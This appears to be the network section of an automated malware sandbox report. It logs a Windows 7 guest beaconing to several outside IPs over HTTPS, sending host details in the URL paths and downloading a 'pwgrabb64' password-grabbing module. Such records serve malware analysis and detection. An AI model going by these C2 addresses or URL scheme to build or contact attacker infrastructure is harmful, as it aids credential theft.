Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
ipinfo.io | 34.117.59.81 |
- UDP Requests
-
-
192.168.56.101:61479 164.124.101.2:53
-
192.168.56.101:62324 164.124.101.2:53
-
192.168.56.101:137 192.168.56.255:137
-
192.168.56.101:138 192.168.56.255:138
-
192.168.56.101:49152 239.255.255.250:3702
-
192.168.56.101:62325 239.255.255.250:3702
-
192.168.56.101:62445 239.255.255.250:1900
-
192.168.56.101:62447 239.255.255.250:3702
-
192.168.56.101:62449 239.255.255.250:3702
-
52.231.114.183:123 192.168.56.101:123
-
GET
200
https://46.99.188.223/lip119/TEST22-PC_W617601.71D63B35517F706F733851BC2CBBF3A3/5/file/
REQUEST
RESPONSE
BODY
GET /lip119/TEST22-PC_W617601.71D63B35517F706F733851BC2CBBF3A3/5/file/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 46.99.188.223
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:43:19 GMT
Content-Type: application/octet-stream
Content-Length: 224
Connection: keep-alive
GET
200
https://46.99.188.223/lip119/TEST22-PC_W617601.71D63B35517F706F733851BC2CBBF3A3/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/z1RfvZD1vvtrtJVrhxtnnRnLXLxp397/
REQUEST
RESPONSE
BODY
GET /lip119/TEST22-PC_W617601.71D63B35517F706F733851BC2CBBF3A3/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/z1RfvZD1vvtrtJVrhxtnnRnLXLxp397/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 46.99.188.223
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:43:20 GMT
Content-Type: text/plain
Content-Length: 735
Connection: keep-alive
GET
200
https://46.99.188.223/lip119/TEST22-PC_W617601.71D63B35517F706F733851BC2CBBF3A3/14/exc/E:%200xc0000005%20A:%200x00000000771D9A5A/0/
REQUEST
RESPONSE
BODY
GET /lip119/TEST22-PC_W617601.71D63B35517F706F733851BC2CBBF3A3/14/exc/E:%200xc0000005%20A:%200x00000000771D9A5A/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 46.99.188.223
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:43:21 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
https://46.99.188.223/lip119/TEST22-PC_W617601.71D63B35517F706F733851BC2CBBF3A3/14/user/test22/0/
REQUEST
RESPONSE
BODY
GET /lip119/TEST22-PC_W617601.71D63B35517F706F733851BC2CBBF3A3/14/user/test22/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 46.99.188.223
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:43:22 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
https://46.99.188.223/lip119/TEST22-PC_W617601.71D63B35517F706F733851BC2CBBF3A3/14/path/C:%5CUsers%5Ctest22%5CAppData%5CLocal%5CTemp%5Cresizebar.png/0/
REQUEST
RESPONSE
BODY
GET /lip119/TEST22-PC_W617601.71D63B35517F706F733851BC2CBBF3A3/14/path/C:%5CUsers%5Ctest22%5CAppData%5CLocal%5CTemp%5Cresizebar.png/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 46.99.188.223
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:43:22 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
https://46.99.188.223/lip119/TEST22-PC_W617601.71D63B35517F706F733851BC2CBBF3A3/14/NAT%20status/client%20is%20behind%20NAT/0/
REQUEST
RESPONSE
BODY
GET /lip119/TEST22-PC_W617601.71D63B35517F706F733851BC2CBBF3A3/14/NAT%20status/client%20is%20behind%20NAT/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 46.99.188.223
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:43:22 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
https://105.27.205.34/lip119/TEST22-PC_W617601.71D63B35517F706F733851BC2CBBF3A3/5/pwgrabb64/
REQUEST
RESPONSE
BODY
GET /lip119/TEST22-PC_W617601.71D63B35517F706F733851BC2CBBF3A3/5/pwgrabb64/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 105.27.205.34
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Fri, 27 Aug 2021 06:43:25 GMT
Content-Type: application/octet-stream
Content-Length: 771952
Last-Modified: Mon, 23 Aug 2021 15:12:36 GMT
Connection: keep-alive
ETag: "6123bae4-bc770"
Accept-Ranges: bytes
GET
200
https://46.99.175.149/lip119/TEST22-PC_W617601.71D63B35517F706F733851BC2CBBF3A3/5/file/
REQUEST
RESPONSE
BODY
GET /lip119/TEST22-PC_W617601.71D63B35517F706F733851BC2CBBF3A3/5/file/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 46.99.175.149
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:43:56 GMT
Content-Type: application/octet-stream
Content-Length: 224
Connection: keep-alive
GET
200
https://46.99.175.149/lip119/TEST22-PC_W617601.71D63B35517F706F733851BC2CBBF3A3/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/nV95LdBjzHxVvvN9bbjL1B91hj9f3TTl/
REQUEST
RESPONSE
BODY
GET /lip119/TEST22-PC_W617601.71D63B35517F706F733851BC2CBBF3A3/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/nV95LdBjzHxVvvN9bbjL1B91hj9f3TTl/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 46.99.175.149
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:43:57 GMT
Content-Type: text/plain
Content-Length: 736
Connection: keep-alive
GET
200
https://46.99.175.149/lip119/TEST22-PC_W617601.71D63B35517F706F733851BC2CBBF3A3/14/exc/E:%200xc0000005%20A:%200x00000000771D9A5A/0/
REQUEST
RESPONSE
BODY
GET /lip119/TEST22-PC_W617601.71D63B35517F706F733851BC2CBBF3A3/14/exc/E:%200xc0000005%20A:%200x00000000771D9A5A/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 46.99.175.149
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:43:58 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
https://46.99.175.149/lip119/TEST22-PC_W617601.71D63B35517F706F733851BC2CBBF3A3/14/user/test22/0/
REQUEST
RESPONSE
BODY
GET /lip119/TEST22-PC_W617601.71D63B35517F706F733851BC2CBBF3A3/14/user/test22/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 46.99.175.149
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:43:58 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
https://46.99.175.149/lip119/TEST22-PC_W617601.71D63B35517F706F733851BC2CBBF3A3/14/NAT%20status/client%20is%20behind%20NAT/0/
REQUEST
RESPONSE
BODY
GET /lip119/TEST22-PC_W617601.71D63B35517F706F733851BC2CBBF3A3/14/NAT%20status/client%20is%20behind%20NAT/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 46.99.175.149
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:43:59 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
https://179.189.229.254/lip119/TEST22-PC_W617601.71D63B35517F706F733851BC2CBBF3A3/5/file/
REQUEST
RESPONSE
BODY
GET /lip119/TEST22-PC_W617601.71D63B35517F706F733851BC2CBBF3A3/5/file/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 179.189.229.254
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:44:25 GMT
Content-Type: application/octet-stream
Content-Length: 224
Connection: keep-alive
GET
200
https://179.189.229.254/lip119/TEST22-PC_W617601.71D63B35517F706F733851BC2CBBF3A3/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/AHvzHrFQV1MQSv8aoTWrUcl1PKGXJRyJ/
REQUEST
RESPONSE
BODY
GET /lip119/TEST22-PC_W617601.71D63B35517F706F733851BC2CBBF3A3/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/AHvzHrFQV1MQSv8aoTWrUcl1PKGXJRyJ/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 179.189.229.254
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:44:26 GMT
Content-Type: text/plain
Content-Length: 736
Connection: keep-alive
GET
200
https://179.189.229.254/lip119/TEST22-PC_W617601.71D63B35517F706F733851BC2CBBF3A3/14/exc/E:%200xc0000005%20A:%200x00000000771D9A5A/0/
REQUEST
RESPONSE
BODY
GET /lip119/TEST22-PC_W617601.71D63B35517F706F733851BC2CBBF3A3/14/exc/E:%200xc0000005%20A:%200x00000000771D9A5A/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 179.189.229.254
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:44:27 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
https://179.189.229.254/lip119/TEST22-PC_W617601.71D63B35517F706F733851BC2CBBF3A3/14/user/test22/0/
REQUEST
RESPONSE
BODY
GET /lip119/TEST22-PC_W617601.71D63B35517F706F733851BC2CBBF3A3/14/user/test22/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 179.189.229.254
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:44:27 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
https://179.189.229.254/lip119/TEST22-PC_W617601.71D63B35517F706F733851BC2CBBF3A3/14/NAT%20status/client%20is%20behind%20NAT/0/
REQUEST
RESPONSE
BODY
GET /lip119/TEST22-PC_W617601.71D63B35517F706F733851BC2CBBF3A3/14/NAT%20status/client%20is%20behind%20NAT/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 179.189.229.254
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:44:28 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
403
https://179.189.229.254/lip119/TEST22-PC_W617601.71D63B35517F706F733851BC2CBBF3A3/10/62/UPAVJRPOIHULLMOEWW/7/
REQUEST
RESPONSE
BODY
GET /lip119/TEST22-PC_W617601.71D63B35517F706F733851BC2CBBF3A3/10/62/UPAVJRPOIHULLMOEWW/7/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 179.189.229.254
HTTP/1.1 403 Forbidden
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:44:29 GMT
Content-Length: 9
Connection: keep-alive
GET
200
http://ipinfo.io/ip
REQUEST
RESPONSE
BODY
GET /ip HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: ipinfo.io
HTTP/1.1 200 OK
access-control-allow-origin: *
content-type: text/html; charset=utf-8
content-length: 15
date: Fri, 27 Aug 2021 06:43:20 GMT
x-envoy-upstream-service-time: 0
Via: 1.1 google
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.101:49203 46.99.188.223:443 |
C=AU, ST=Some-State, O=Internet Widgits Pty Ltd | C=AU, ST=Some-State, O=Internet Widgits Pty Ltd | b5:21:a8:16:d5:97:b1:67:f6:60:a5:cb:20:27:76:ec:3c:9d:3b:02 |
TLSv1 192.168.56.101:49207 46.99.175.149:443 |
C=AU, ST=Some-State, O=Internet Widgits Pty Ltd | C=AU, ST=Some-State, O=Internet Widgits Pty Ltd | b5:21:a8:16:d5:97:b1:67:f6:60:a5:cb:20:27:76:ec:3c:9d:3b:02 |
TLSv1 192.168.56.101:49205 105.27.205.34:443 |
C=US, ST=IL, L=Chicago, O=Internet Widgits Pty Ltd | C=US, ST=IL, L=Chicago, O=Internet Widgits Pty Ltd | 30:21:9a:cd:06:f2:ba:20:f6:0b:3c:54:ec:08:35:d0:9d:4b:e8:50 |
TLSv1 192.168.56.101:49215 221.147.172.5:443 |
C=US, ST=IL, L=Chicago, O=Internet Widgits Pty Ltd | C=US, ST=IL, L=Chicago, O=Internet Widgits Pty Ltd | 30:21:9a:cd:06:f2:ba:20:f6:0b:3c:54:ec:08:35:d0:9d:4b:e8:50 |
TLSv1 192.168.56.101:49213 179.189.229.254:443 |
C=AU, ST=Some-State, O=Internet Widgits Pty Ltd | C=AU, ST=Some-State, O=Internet Widgits Pty Ltd | b5:21:a8:16:d5:97:b1:67:f6:60:a5:cb:20:27:76:ec:3c:9d:3b:02 |
Snort Alerts
No Snort Alerts